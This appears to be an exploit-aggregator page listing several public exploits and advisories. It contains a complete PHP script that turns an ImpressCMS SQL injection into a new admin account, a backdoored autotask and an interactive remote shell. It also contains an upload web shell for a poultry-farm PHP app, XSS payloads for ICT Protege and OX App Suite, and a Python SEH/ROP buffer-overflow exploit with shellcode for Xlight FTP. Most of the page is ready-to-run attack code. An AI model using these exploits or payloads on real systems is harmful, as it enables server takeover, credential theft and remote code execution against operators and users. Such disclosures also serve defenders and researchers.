Latest exploits :: CodePwn

<pre><code><?php /* ---------------------------------------------------------- ImpressCMS <= 1.4.2 SQL Injection to Remote Code Execution ---------------------------------------------------------- author..............: Egidio Romano aka EgiX mail................: n0b0d13s[at]gmail[dot]com software link.......: https://www.impresscms.org +-------------------------------------------------------------------------+ | This proof of concept code was written for educational purpose only. | | Use it at your own risk. Author will be not responsible for any damage. | +-------------------------------------------------------------------------+ [-] Vulnerability Description: User input passed through the "groups" POST parameter to the /include/findusers.php script is not properly sanitized before being passed to the icms_member_Handler::getUserCountByGroupLink() and icms_member_Handler::getUsersByGroupLink() methods. These methods use the first argument to construct a SQL query without proper validation, and this can be exploited by remote attackers to e.g. read sensitive data from the "users" database table through boolean-based SQL Injection attacks. The application uses PDO as a database driver, which allows for stacked SQL queries, as such this vulnerability could be exploited to e.g. create a new admin user and execute arbitrary PHP code. [-] CVE Reference: The Common Vulnerabilities and Exposures project (cve.mitre.org) has assigned the name CVE-2021-26599 to this vulnerability. [-] Disclosure timeline: [19/01/2021] - Vendor notified through HackerOne [29/01/2021] - Vulnerability acknowledged by the vendor [03/02/2021] - CVE number assigned [06/02/2022] - Version 1.4.3 released, vulnerability not correctly fixed [11/02/2022] - Vendor was informed about the ineffective fix [09/03/2022] - Version 1.4.4 released [22/03/2022] - Public disclosure [-] Technical writeup: http://karmainsecurity.com/impresscms-from-unauthenticated-sqli-to-rce */ set_time_limit(0); error_reporting(E_ERROR); if (!extension_loaded("curl")) die("[-] cURL extension required!\n"); function hex_enc($input) { for ($i = 0; $i < strlen($input); $i++) $encoded .= sprintf("%02x", ord($input[$i])); return "0x{$encoded}"; } print "+-----------------------------------------------------------+\n"; print "| ImpressCMS <= 1.4.2 Remote Code Execution Exploit by EgiX |\n"; print "+-----------------------------------------------------------+\n"; if ($argc != 2) { print "\nUsage: php $argv[0] <URL>"; print "\nExample.: php $argv[0] http://localhost/impresscms/"; print "\nExample.: php $argv[0] https://www.impresscms.org/\n\n"; die(); } $url = $argv[1]; $ch = curl_init(); curl_setopt($ch, CURLOPT_HEADER, true); curl_setopt($ch, CURLOPT_RETURNTRANSFER, true); curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false); print "\n[+] Retrieving security token (CVE-2021-26598)\n"; curl_setopt($ch, CURLOPT_URL, "{$url}misc.php?action=showpopups&type=friend"); $res = curl_exec($ch); if (!preg_match("/(cookie: [^;]+); path/i", $res, $sid)) die("[-] Session coookie not found!\n"); if (!preg_match("/TOKEN_REQUEST' value='([^']+)'/", $res, $token)) die("[-] Token not found!\n"); print "[+] Starting SQL Injection attack (CVE-2021-26599)\n"; print "[*] Step 1: retrieving database name\n"; curl_setopt($ch, CURLOPT_URL, "{$url}include/findusers.php"); curl_setopt($ch, CURLOPT_HTTPHEADER, [$sid[1]]); $params = "user_submit=1&token={$token[1]}&groups[]=%s"; $min = true; $idx = 1; while(1) { $test = 256; for ($i = 7; $i >= 0; $i--) { $test = $min ? ($test - pow(2, $i)) : ($test + pow(2, $i)); $sql = "1) AND ORD(SUBSTR(DATABASE(),{$idx},1))<{$test}#"; curl_setopt($ch, CURLOPT_POSTFIELDS, sprintf($params, urlencode($sql))); $min = !preg_match("/No Users Found/", curl_exec($ch)); } if (($chr = $min ? ($test - 1) : ($test)) == 0) break; $dbname .= chr($chr); $min = true; $idx++; print "\r[+] DB name: {$dbname}"; } print "\n[*] Step 2: retrieving tables prefix\n"; $sub = "SELECT TRIM(TRAILING 'users' FROM table_name) FROM information_schema.tables WHERE table_schema='{$dbname}' AND table_name LIKE '%users'"; $min = true; $idx = 1; while(1) { $test = 256; for ($i = 7; $i >= 0; $i--) { $test = $min ? ($test - pow(2, $i)) : ($test + pow(2, $i)); $sql = hex_enc("SELECT IF(ORD(SUBSTR(({$sub}),{$idx},1))<{$test},1,SLEEP(1))"); $sql = "0); SET @q = {$sql}; PREPARE stmt FROM @q; EXECUTE stmt;#"; curl_setopt($ch, CURLOPT_POSTFIELDS, sprintf($params, urlencode($sql))); $start = time(); curl_exec($ch); $secs = time() - $start; $min = ($secs < 2); } if (($chr = $min ? ($test - 1) : ($test)) == 0) break; $prefix .= chr($chr); $min = true; $idx++; print "\r[+] Prefix: {$prefix}"; } print "\n[*] Step 3: creating new admin user\n"; $uid = time(); $enc = hex_enc("egix"); $pwd = hex_enc(md5("egix")); $sql = "0); INSERT INTO {$prefix}users (uid, uname, login_name, pass, level, enc_type) VALUES ({$uid}, {$enc}, {$enc}, {$pwd}, 5, 0)#"; curl_setopt($ch, CURLOPT_POSTFIELDS, sprintf($params, urlencode($sql))); curl_exec($ch); $sql = "0); INSERT INTO {$prefix}groups_users_link (groupid, uid) VALUES (1, {$uid})#"; curl_setopt($ch, CURLOPT_POSTFIELDS, sprintf($params, urlencode($sql))); curl_exec($ch); print "[+] Trying to login as the new user\n"; curl_setopt($ch, CURLOPT_URL, "{$url}user.php"); curl_setopt($ch, CURLOPT_POSTFIELDS, "uname=egix&pass=egix&op=login"); if (!preg_match("/(cookie: [^;]+); path/i", curl_exec($ch), $sid)) die("[-] Login failed!\n"); print "[+] Creating malicious autotask\n"; $phpcode = urlencode("if (isset(\$_SERVER[HTTP_CMD])) { print(____); passthru(base64_decode(\$_SERVER[HTTP_CMD])); die; }"); curl_setopt($ch, CURLOPT_URL, "{$url}modules/system/admin.php"); curl_setopt($ch, CURLOPT_HTTPHEADER, [$sid[1], "Referer: {$url}"]); curl_setopt($ch, CURLOPT_POSTFIELDS, "fct=autotasks&sat_name=rce&sat_code={$phpcode}&sat_enabled=1&op=addautotasks"); if (!preg_match("/HTTP.*302/i", curl_exec($ch))) die("[-] Something went wrong!\n"); print "[+] Launching shell\n"; curl_setopt($ch, CURLOPT_URL, $url); curl_setopt($ch, CURLOPT_POST, false); while(1) { print "\nimpresscms-shell# "; if (($cmd = trim(fgets(STDIN))) == "exit") break; curl_setopt($ch, CURLOPT_HTTPHEADER, ["CMD: ".base64_encode($cmd)]); preg_match('/____(.*)/s', curl_exec($ch), $m) ? print $m[1] : die("\n[-] Exploit failed!\n"); } </code></pre>

<pre><code> ICT Protege GX/WX 2.08 Client-Side SHA1 Password Hash Disclosure Vendor: Integrated Control Technology Ltd. Product web page: https://www.ict.co Affected version: GX: Ver: 2.08.1002 K1B3 Lib: 04.00.217 Int: 2.3.235.J013 OS: 2.0.20 WX: Ver: 4.00 284 H062 App: 02.08.766 Lib: 04.00.169 Int: 02.2.208 Summary: Protege GX is an enterprise level integrated access control, intrusion detection and building automation solution with a feature set that is easy to operate, simple to integrate and effortless to extend. Protege WX is an all-in-one, web-based, cross-platform system that gives you a fully functional access control and intrusion detection solution in a fraction of the time of conventional software. With no software to install, setup is quick and simple. Connect the Controller and system components, then open a web browser to launch the intuitive wizard-driven interface which guides you through the process of configuring your system. Desc: The application is vulnerable to improper access control that allows an authenticated operator to disclose SHA1 password hashes (client-side) of other users/operators. Tested on: Microsoft-WinCE/6.00 Vulnerability discovered by Gjoko 'LiquidWorm' Krstic @zeroscience Advisory ID: ZSL-2022-5700 Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2022-5700.php 08.02.2022 -- Navigate to http://CONTROLLER_IP/operator.htm Source: <label id="OperatorPassword">Password</label><input type="password" id="Password" value="" class="narrow" readonly=""> <input type="button" id="ButtonChangeOperatorPassword" class="narrow" style="float: right; margin-right: 23%; width: auto;" onclick="updatePassword('operator');" data-multiselect="disabled" value="Change Password"> ... ... <input type="hidden" id="pswdsha" value="053e98c13fcbd7df3bf3a220088e19c867dfd4cc"> ... </code></pre>

<pre><code> ICT Protege GX/WX 2.08 Authenticated Stored XSS Vulnerability Vendor: Integrated Control Technology Ltd. Product web page: https://www.ict.co Affected version: GX: Ver: 2.08.1002 K1B3 Lib: 04.00.217 Int: 2.3.235.J013 OS: 2.0.20 WX: Ver: 4.00 284 H062 App: 02.08.766 Lib: 04.00.169 Int: 02.2.208 Summary: Protege GX is an enterprise level integrated access control, intrusion detection and building automation solution with a feature set that is easy to operate, simple to integrate and effortless to extend. Protege WX is an all-in-one, web-based, cross-platform system that gives you a fully functional access control and intrusion detection solution in a fraction of the time of conventional software. With no software to install, setup is quick and simple. Connect the Controller and system components, then open a web browser to launch the intuitive wizard-driven interface which guides you through the process of configuring your system. Desc: The application suffers from an authenticated stored XSS vulnerability. The issue is triggered when input passed to the 'Name' parameter is not properly sanitized before being returned to the user. This can be exploited to execute arbitrary HTML and script code in a user's browser session in context of an affected site. Tested on: Microsoft-WinCE/6.00 Vulnerability discovered by Gjoko 'LiquidWorm' Krstic @zeroscience Advisory ID: ZSL-2022-5699 Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2022-5699.php 08.02.2022 -- UI navigation: -------------- Scheduling > Daylight Savings > (Name field). Decrypted POST request: ----------------------- POST /daylightsaving.htm Command&Type=Submit&SubType=GXT_DAYLIGHTSAVINGS_TBL&DaylightSavingId=1&action=update&Name=ZSL%22%3E%3Cscript%3Ealert(1)%3C%2Fscript%3E&StartMonth=10&EndMonth=2&StartDay=41&EndDay=41&RecId=1 Encrypted GET request: ---------------------- http://CONTROLLER_IP/PRT_CTRL_DIN_ISAPI.dll?8F7FFABE947FEE9C78850F2BA679A3B1645F6378696B32385B56303C43604B48F8CD082303AADCFCECEA082384C860AB16159DADCD89C9A7A2A47EE1F49A7A98AC9A8572882F88FAE5409CF6E06E04DA7F7D10AA6D45525C62B2A62FD949FF00E6B6B7471010908D9A59FBA1D9F304AD8CB24E0CE317A0870AA5A5253F0FCD58CA2BC874AC002CB62422E184FB9F13161C9C00E08F258B8519578EA2793A0C28A4AF51CF65637C0C2F972CE3F49703214A63AA78B3EBE5C720DBE1E9C97E772334EC95480956E27DB6D1DF4489C5D60CCE27D69B388CA6C69A9DC72D85127F870DDA4E459CA245508EBFD66D1C83D9FA12838C1F426E538D5D75192B57DF5AF6 Additional info: ---------------- Databse backup predictable name: Db_D3037E8A_8_Feb_22.bak The D3037E8A is the serial number of the onboard reader. Encrypt/Decrypt functions: -------------------------- From console: > localStorage.getItem("WXKey") < '8EDB22D9FB767538' function encryptAES(a, c) { a = a.toString(); a = unescape(encodeURIComponent(a)); "undefined" == typeof c && (c = !0); if (0 == servertype) return a; var b = localStorage.getItem("WXKey"); if ("" == b || null == b) return a; for (var d = "", e = 0; 16 > e; e++) d += String.fromCharCode(Math.floor(75 * Math.random() + 48)); a = d + mcrypt.Encrypt(addPKCS7(a), d, b, "rijndael-128", "cbc"); return a = c ? getCookie("SESSID") + strToHex(a) : strToHex(a) } function decryptAES(a) { if (null == a) return ""; a = a.toString(); if ("<invalid session> < Packet not Init and not encrypted. >" == a) a = 0 == servertype ? "login.php" : "login.htm", window.location = a + "?" + Math.random().toString(16).substring(2, 8).toLowerCase(); else if ("<invalid session>" == a.substr(0, 17)) a = 0 == servertype ? "login.php?logout" : "login.htm?logout", window.location = a + "?" + Math.random().toString(16).substring(2, 8).toLowerCase(); else { if (0 == servertype) return a; var c = localStorage.getItem("WXKey"); if ("" == c) return a; a = hexToStr(a); var b = a.substr(0, 16); a = a.substr(16, a.length); a = mcrypt.Decrypt(a, b, c, "rijndael-128", "cbc").replace(/\x00+$/g, ""); a = removePKCS7(a); return a = decodeURIComponent(escape(a)) } </code></pre>

<pre><code>Product: OX App Suite Vendor: OX Software GmbH Internal reference: OXUIB-1092 Vulnerability type: Cross-Site Scripting (CWE-80) Vulnerable version: 7.10.5 Vulnerable component: frontend Report confidence: Confirmed Solution status: Fixed by Vendor Fixed version: 7.10.5-rev26 Vendor notification: 2021-11-15 Solution date: 2021-12-14 Public disclosure: 2022-03-21 CVE reference: CVE-2021-44208 CVSS: 6.5 (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N) Vulnerability Details: System messages at the OX Chat component are escaped to avoid injection of malicious code. However, this check is not performed for messages that are "unknown" to the system. Such messages do not occur during normal operations. Risk: Malicious script code can be executed within the victims context. This can lead to session hijacking or triggering unwanted actions via the web interface (e.g. redirecting to a third-party site). To exploit this an attacker would require the victim to follow a hyperlink or compromise of chat components. Steps to reproduce: 1. Maliciously modify the chat infrastructure to inject "unknown" messages that contain script code 2. Make the victim connect to that infrastructure and request messages for their account Solution: We now sanitize "unknown" system messages, in case this scenario may ever happen in the wild. --- Internal reference: MWB-1322 Vulnerability type: Cross-Site Scripting (CWE-80) Vulnerable version: 7.10.5 and earlier Vulnerable component: middleware Report confidence: Confirmed Solution status: Fixed by Vendor Fixed version: 7.10.5-rev32 Vendor notification: 2021-11-12 Solution date: 2021-12-14 Public disclosure: 2022-03-21 CVE reference: CVE-2021-44209 CVSS: 5.4 (CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:N) Vulnerability Details: Specific HTML5 tags and some attributes were not sufficiently considered when detecting malicious code thats being served as download. Risk: Malicious script code can be executed within the victims context. This can lead to session hijacking or triggering unwanted actions via the web interface (e.g. redirecting to a third-party site). To exploit this an attacker would require the victim to follow a hyperlink. Steps to reproduce: 1. Upload a HTML5 document with specific tags, set a HTML file extension but a misleading media-type 2. Share the file and make a victim click a hyperlink to that resource Proof of concept: <audio src="/appsuite/apps/themes/default/sounds/bell.ogg" onprogress="alert('XSS');" onsuspend="alert('XSS');" controls></audio> Solution: We improved HTML detection and examine a complete list of tags, attributes and event handlers. --- Internal reference: MWB-1260 Vulnerability type: Cross-Site Scripting (CWE-80) Vulnerable version: 7.10.5 and earlier Vulnerable component: middleware Report confidence: Confirmed Solution status: Fixed by Vendor Fixed version: 7.10.5-rev32 Vendor notification: 2021-09-27 Solution date: 2021-12-14 Public disclosure: 2022-03-21 CVE reference: CVE-2021-44210 CVSS: 5.4 (CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:N) Vulnerability Details: Certain media formats (NIFF) in this case, were not detected to contain potentially harmful content. This can be exploited by an attacker by uploading malicious content in disguise. Some browsers will attempt to render NIFF sources as inline content. Risk: Malicious script code can be executed within the victims context. This can lead to session hijacking or triggering unwanted actions via the web interface (e.g. redirecting to a third-party site). To exploit this an attacker would require the victim to follow a hyperlink. Steps to reproduce: 1. Generate malicious JS/HTML content and upload it as NIFF image, change the media-type accordingly 2. Share that malicious code using "sharing" 3. Make a victim follow a link to the malicious share Solution: We now detect NIFF as potentially malicious content and force browsers to download it. --- Internal reference: MWB-1259 Vulnerability type: Cross-Site Scripting (CWE-80) Vulnerable version: 7.10.5 and earlier Vulnerable component: middleware Report confidence: Confirmed Solution status: Fixed by Vendor Fixed version: 7.10.5-rev32 Vendor notification: 2021-09-27 Solution date: 2021-12-14 Public disclosure: 2022-03-21 CVE reference: CVE-2021-44211 CVSS: 3.5 (CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:L/I:N/A:N) Vulnerability Details: HTML E-Mail signatures are processed by a sanitizer. This sanitizer can be tricked to generate malicious output by injecting seemingly benign garbled HTML code. Risk: Malicious script code can be executed within the victims context. This can lead to session hijacking or triggering unwanted actions via the web interface (e.g. redirecting to a third-party site). To exploit this an attacker would require some level of access to the victims account, context and pull off a social engineering attack. Steps to reproduce: 1. Create a malicious E-Mail signature 2. Share and make a victim select that E-Mail signature Proof of concept: <img src class="src=cid:asd onerror=alert('XSS')//"> Solution: We now check the HTML "class" attribute for potential malicious content for HTML E-Mail signatures. --- Internal reference: MWB-1219 Vulnerability type: Cross-Site Scripting (CWE-80) Vulnerable version: 7.10.5 and earlier Vulnerable component: middleware Report confidence: Confirmed Solution status: Fixed by Vendor Fixed version: 7.10.5-rev32 Vendor notification: 2021-08-17 Solution date: 2021-12-14 Public disclosure: 2022-03-21 CVE reference: CVE-2021-44212 CVSS: 5.4 (CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:N) Vulnerability Details: Script tags at HTML content can be obfuscated by using trailing control commands to bypass existing sanitizers. Risk: Malicious script code can be executed within the victims context. This can lead to session hijacking or triggering unwanted actions via the web interface (e.g. redirecting to a third-party site). To exploit this an attacker would require the victim to follow a hyperlink. Steps to reproduce: 1. Create malicious script code and obfuscate HTML tags using control characters 2. Share the malicious code and make a victim click a link that points to this code Proof of concept: <script\t>alert("XSS");</script\t> Solution: We now improve detection of obfuscated HTML tags. --- Internal reference: MWB-1216 Vulnerability type: Cross-Site Scripting (CWE-80) Vulnerable version: 7.10.5 and earlier Vulnerable component: middleware Report confidence: Confirmed Solution status: Fixed by Vendor Fixed version: 7.10.5-rev32 Vendor notification: 2021-08-13 Solution date: 2021-12-14 Public disclosure: 2022-03-21 CVE reference: CVE-2021-44213 CVSS: 6.5 (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N) Vulnerability Details: Binary uu-encoded content at multipart/alternative E-Mails is processed as mail body without sanitization in certain cases. Risk: Malicious script code can be executed within the victims context. This can lead to session hijacking or triggering unwanted actions via the web interface (e.g. redirecting to a third-party site). To exploit this the victim needs to interact with the message. Steps to reproduce: 1. Generate a malicious mail with binary unix-to-unix content and a specific header structure, add placeholder content to trigger the "Show entire message" feature 2. Send that E-Mail to the victim 3. As the victim, select the message and follow the "Show entire content" link Proof of concept: ?/'-C<FEP=#YA;&5R="@B6%-3(BD[/"]S8W)I<'0^"@`` becomes <script>alert("XSS");</script> Solution: We now advertise uu-encoded E-Mail parts as file attachment rather than the mail body. </code></pre>

<pre><code># Title: Poultry Farm Management System 1.0 Remote Code Execution (RCE) # Author: Hejap Zairy # Date: 20.07.2022 # Vendor: https://www.sourcecodester.com/php/15230/poultry-farm-management-system-free-download.html # Software: https://www.sourcecodester.com/sites/default/files/download/oretnom23/Redcock-Farm.zip # Reference: https://github.com/Matrix07ksa # Tested on: Windows, MySQL, Apache registered user can bypass waf upload .php.png files in attachments section with use of intercept tool in burbsuite to edit the raw #vulnerability Code php Needs more filtering to upload profile files ```php if(isset($_POST['submit'])) { $adminid=$_SESSION['odmsaid']; $productname=$_POST['productName']; $productimage1=$_FILES["productimage1"]["name"]; move_uploaded_file($_FILES["productimage1"]["tmp_name"],"profileimages/".$_FILES["productimage1"]["name"]); $sql="update tbladmin set Photo=:productimage1 where ID=:aid"; $query = $dbh->prepare($sql); $query->bindParam(':productimage1',$productimage1,PDO::PARAM_STR); $query->bindParam(':aid',$pid,PDO::PARAM_STR); $query->execute(); $_SESSION['msg']="profile Image Updated Successfully !!"; } ?> ``` [+] Payload POST ``` POST /Redcock-Farm/farm/update_image.php?id=2 HTTP/1.1 Host: 0day.gov Cookie: PHPSESSID=2vah9hmhjf85ichdav814rhcgu User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: multipart/form-data; boundary=---------------------------409902128312379197203124536738 Content-Length: 882 Origin: https://0day.gov Referer: https://0day.gov/Redcock-Farm/farm/update_image.php?id=2 Upgrade-Insecure-Requests: 1 Te: trailers Connection: close -----------------------------409902128312379197203124536738 Content-Disposition: form-data; name="productName" Hejap Zairy -----------------------------409902128312379197203124536738 Content-Disposition: form-data; name="productimage1"; filename="0day_hejap.php" Content-Type: image/png <?=`$_GET[515]`?> -----------------------------409902128312379197203124536738 Content-Disposition: form-data; name="submit" -----------------------------409902128312379197203124536738-- ``` #Status: CRITICAL [+] Payload GET ``` GET /Redcock-Farm/farm/profileimages/0day_hejap.php?515=echo%200day%20hejap%20Zairy HTTP/1.1 Host: 0day.gov Cookie: PHPSESSID=2vah9hmhjf85ichdav814rhcgu User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Upgrade-Insecure-Requests: 1 Te: trailers Connection: close ``` #Response ``` HTTP/1.1 200 OK Date: Sun, 20 Mar 2022 08:04:28 GMT Server: Apache/2.4.52 (Win64) OpenSSL/1.1.1m PHP/7.4.27 X-Powered-By: PHP/7.4.27 Content-Length: 17 Connection: close Content-Type: text/html; charset=UTF-8 0day hejap Zairy ``` # Description: The file upload bypass WAF vulnerability occurs when the user uploads an executable script file, and through the script file to obtain the ability to execute server-side commands. This attack is the most direct and effective, sometimes having almost no technical barriers. # Proof and Exploit: https://i.imgur.com/uZfnU3c.png </code></pre>

<pre><code># Exploit Title: Xlight FTP v3.9.3.2 - Buffer Overflow (SEH Egghunter + ROP) # Exploit Author: Hejap Zairy # Date: 13.07.2022 # Software Link: http://www.xlightftpd.com/download/setup.exe # Tested Version: v3.9.3.2(2022-1-5) # Tested on: Windows 10 64bit # 1.- Run python code : 0day-Hejap_Zairy.py # 2.- Open 0day_Hejap.txt and copy All content to Clipboard # 3.- Open Audio Conversion Wizard and press Enter Code # 5.- Click 'Server ip ' -> 'General' -> 'Advanced' -> 'Excute a program after user logged in ' -> 'Setup' # 6.- Crashed # Author Code By Hejap Zairy #!/usr/bin/env python # Auther Hejap Zairy #!/usr/bin/env python import struct ##================================================================================ ## 2022-03-12 16:54:06 ##================================================================================ ##----------------------------------------------------------------------------------------------------------------------------------------- ## Module info : ##----------------------------------------------------------------------------------------------------------------------------------------- ## Base | Top | Size | Rebase | SafeSEH | ASLR | NXCompat | OS Dll | Version, Modulename & Path ##----------------------------------------------------------------------------------------------------------------------------------------- ## 0x76aa0000 | 0x76ae4000 | 0x00044000 | True | True | True | False | True | 10.0.17763.1 [SHLWAPI.dll] (C:\Windows\System32\SHLWAPI.dll) ## 0x76970000 | 0x76a93000 | 0x00123000 | True | True | True | False | True | 10.0.17763.1490 [ucrtbase.dll] (C:\Windows\System32\ucrtbase.dll) ## 0x766a0000 | 0x766bc000 | 0x0001c000 | True | True | True | False | True | 10.0.17763.1075 [profapi.dll] (C:\Windows\System32\profapi.dll) ## 0x76340000 | 0x763c0000 | 0x00080000 | True | True | True | False | True | 10.0.17763.1 [msvcp_win.dll] (C:\Windows\System32\msvcp_win.dll) ## 0x75680000 | 0x757ea000 | 0x0016a000 | True | True | True | False | True | 10.0.17763.1879 [gdi32full.dll] (C:\Windows\System32\gdi32full.dll) ## 0x75a60000 | 0x75bfe000 | 0x0019e000 | True | True | True | False | True | 10.0.17763.1 [CRYPT32.dll] (C:\Windows\System32\CRYPT32.dll) ## 0x74ff0000 | 0x74fff000 | 0x0000f000 | True | True | True | False | True | 10.0.17763.1 [kernel.appcore.dll] (C:\Windows\System32\kernel.appcore.dll) ## 0x00400000 | 0x006d5000 | 0x002d5000 | False | False | False | False | False | 3.9.3.2 [xlight.exe] (C:\Users\Tarnished\Desktop\Xlight\xlight.exe) ## 0x74870000 | 0x74909000 | 0x00099000 | True | True | True | False | True | 10.0.17763.1075 [ODBC32.dll] (C:\Windows\SYSTEM32\ODBC32.dll) ## 0x74b20000 | 0x74bbc000 | 0x0009c000 | True | True | True | False | True | 10.0.17763.1 [apphelp.dll] (C:\Windows\SYSTEM32\apphelp.dll) ## 0x76280000 | 0x76297000 | 0x00017000 | True | True | True | False | True | 10.0.17763.1 [win32u.dll] (C:\Windows\System32\win32u.dll) ## 0x75c50000 | 0x761a6000 | 0x00556000 | True | True | True | False | True | 10.0.17763.1911 [SHELL32.dll] (C:\Windows\System32\SHELL32.dll) ##0x006d4270 : kernel32.loadlibrarya | 0x76ce2280 | startnull,asciiprint,ascii,alphanum {PAGE_READWRITE} [xlight.exe] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v3.9.3.2 (C:\Users\Tarnished\Desktop\Xlight\xlight.exe) ##0x006d4258 : comdlg32.getopenfilenamea | 0x77226240 | startnull,asciiprint,ascii,alphanum {PAGE_READWRITE} [xlight.exe] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v3.9.3.2 (C:\Users\Tarnished\Desktop\Xlight\xlight.exe) ##0x006d427c : kernel32.virtualprotect | 0x76ce0c10 | startnull,asciiprint,ascii {PAGE_READWRITE} [xlight.exe] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v3.9.3.2 (C:\Users\Tarnished\Desktop\Xlight\xlight.exe) ##0x006d4278 : kernel32.getprocaddress | 0x76ce05a0 | startnull,asciiprint,ascii,alphanum {PAGE_READWRITE} [xlight.exe] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v3.9.3.2 (C:\Users\Tarnished\Desktop\Xlight\xlight.exe) # RopFunc syscall null badchars = [0x00,0x0a,0x0d,0x3a,0xff] buf = b"" buf += b"\xd9\xeb\x9b\xd9\x74\x24\xf4\x31\xd2\xb2\x77\x31\xc9" buf += b"\x64\x8b\x71\x30\x8b\x76\x0c\x8b\x76\x1c\x8b\x46\x08" buf += b"\x8b\x7e\x20\x8b\x36\x38\x4f\x18\x75\xf3\x59\x01\xd1" buf += b"\xff\xe1\x60\x8b\x6c\x24\x24\x8b\x45\x3c\x8b\x54\x28" buf += b"\x78\x01\xea\x8b\x4a\x18\x8b\x5a\x20\x01\xeb\xe3\x34" buf += b"\x49\x8b\x34\x8b\x01\xee\x31\xff\x31\xc0\xfc\xac\x84" buf += b"\xc0\x74\x07\xc1\xcf\x0d\x01\xc7\xeb\xf4\x3b\x7c\x24" buf += b"\x28\x75\xe1\x8b\x5a\x24\x01\xeb\x66\x8b\x0c\x4b\x8b" buf += b"\x5a\x1c\x01\xeb\x8b\x04\x8b\x01\xe8\x89\x44\x24\x1c" buf += b"\x61\xc3\xb2\x08\x29\xd4\x89\xe5\x89\xc2\x68\x8e\x4e" buf += b"\x0e\xec\x52\xe8\x9f\xff\xff\xff\x89\x45\x04\xbb\xef" buf += b"\xce\xe0\x60\x87\x1c\x24\x52\xe8\x8e\xff\xff\xff\x89" buf += b"\x45\x08\x68\x6c\x6c\x20\x41\x68\x33\x32\x2e\x64\x68" buf += b"\x75\x73\x65\x72\x30\xdb\x88\x5c\x24\x0a\x89\xe6\x56" buf += b"\xff\x55\x04\x89\xc2\x50\xbb\xa8\xa2\x4d\xbc\x87\x1c" buf += b"\x24\x52\xe8\x5f\xff\xff\xff\x68\x6f\x78\x58\x20\x68" buf += b"\x61\x67\x65\x42\x68\x4d\x65\x73\x73\x31\xdb\x88\x5c" buf += b"\x24\x0a\x89\xe3\x68\x58\x20\x20\x20\x68\x61\x69\x72" buf += b"\x79\x68\x61\x70\x20\x5a\x68\x20\x48\x65\x6a\x68\x30" buf += b"\x64\x61\x79\x31\xc9\x88\x4c\x24\x10\x89\xe1\x31\xd2" buf += b"\x52\x53\x51\x52\xff\xd0\x31\xc0\x50\xff\x55\x08" def Hejap_rop_chain(): Hejap_gadgets = [ 0x75c4f468, # POP EBX # RETN [windows.storage.dll] ** REBASED ** ASLR 0x7731c2a0, # ptr to &VirtualProtect() [IAT CRYPT32.dll] ** REBASED ** ASLR 0x75deb176, # MOV ESI,DWORD PTR DS:[EBX] # RETN [windows.storage.dll] ** REBASED ** ASLR #[---INFO:gadgets_to_set_ebp:---] 0x7545eebb, # POP EBP # RETN [SHLWAPI.dll] ** REBASED ** ASLR 0x75ff2bdb, # & call esp [msvcp_win.dll] ** REBASED ** ASLR #[---INFO:gadgets_to_set_ebx:---] 0x755d53b2, # POP EAX # RETN [KERNELBASE.dll] ** REBASED ** ASLR 0xfffffdff, # Value to negate, will become 0x00000201 0x74d241d7, # NEG EAX # RETN [USER32.dll] ** REBASED ** ASLR 0x75e72ff1, # XCHG EAX,EBX # RETN [windows.storage.dll] ** REBASED ** ASLR #[---INFO:gadgets_to_set_edx:---] 0x765a2dad, # POP EAX # RETN [bcryptPrimitives.dll] ** REBASED ** ASLR 0xffffffc0, # Value to negate, will become 0x00000040 0x75297b65, # NEG EAX # RETN [gdi32full.dll] ** REBASED ** ASLR 0x76a3b05a, # XCHG EAX,EDX # RETN [SHELL32.dll] ** REBASED ** ASLR #[---INFO:gadgets_to_set_ecx:---] 0x72bb29ef, # POP ECX # RETN [UXTHEME.DLL] ** REBASED ** ASLR 0x7774f16b, # &Writable location [ntdll.dll] ** REBASED ** ASLR #[---INFO:gadgets_to_set_edi:---] 0x77275d3d, # POP EDI # RETN [CRYPT32.dll] ** REBASED ** ASLR 0x75849686, # RETN (ROP NOP) [KERNEL32.DLL] ** REBASED ** ASLR #[---INFO:gadgets_to_set_eax:---] 0x72bf2465, # POP EAX # RETN [UXTHEME.DLL] ** REBASED ** ASLR 0x90909090, # nop #[---INFO:pushad:---] 0x76a37959, # PUSHAD # RETN [SHELL32.dll] ** REBASED ** ASLR ] return ''.join(struct.pack('<I', _) for _ in Hejap_gadgets) egg = "\x66\x81\xca\xff\x0f\x42\x52\x6a\x02\x58\xcd\x2e\x3c\x05\x5a\x74" egg+="\xef\xb8\x68\x30\x30\x70\x8b\xfa\xaf\x75\xea\xaf\x75\xe7\xff\xe7" rop_chain = Hejap_rop_chain() offset = 452 nseh = "\x90" * 4 junk = "A" * (offset - len(nseh)) stackpivot = struct.pack('<I', 0x8e648b26 ) # POP ESP # POP EBP # RETN ** [xlight.exe #seh = struct.pack('<I', 0x0019ccb8 ) null buffer = junk + nseh + stackpivot + rop_chain + "\x90" * 5 + egg + 'h00ph00p' + buf + "\x90" * (1000 - len(egg)-len(stackpivot)) f = open("0day_hejap.txt", "w") f.write(buffer) f.close() # Proof and Exploit: https://i.imgur.com/jMURHQF.png https://i.imgur.com/aw6hZo2.png #Video https://streamable.com/gmqz5x </code></pre>

